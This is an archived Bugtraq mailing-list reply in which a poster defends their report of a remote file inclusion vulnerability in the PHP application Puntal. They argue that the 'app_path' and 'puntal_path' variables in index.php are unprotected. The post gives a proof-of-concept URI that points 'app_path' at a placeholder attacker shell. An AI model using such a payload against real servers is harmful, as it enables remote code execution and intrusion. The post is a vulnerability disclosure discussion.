| New User, Welcome! Login |
Re: RE: Puntal (index.php) Remote File Inclusion Vulnerabilities
| From: |
donald00 live com |
| To: |
bugtraq securityfocus com |
| Cc: |
|
| Subject: |
Re: RE: Puntal (index.php) Remote File Inclusion Vulnerabilities |
| Date: |
Mon - May 03, 2010 05:44 PM |
sorry Tom , in which line which confirms that the variable "app_path" and "puntal_path" is defined with functions to protect and handle inclusion or accessing to or from index.php file ?
please check again or Read the full script code in index.php file , and then please seen or check The example URI / P0C for this issue.
For verified or proofed this Vulnerabilities , I just Install Puntal , and this exploits is working.
http://localhost//path/index.php?app_path= <attacker shell>
|
|
|
Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!
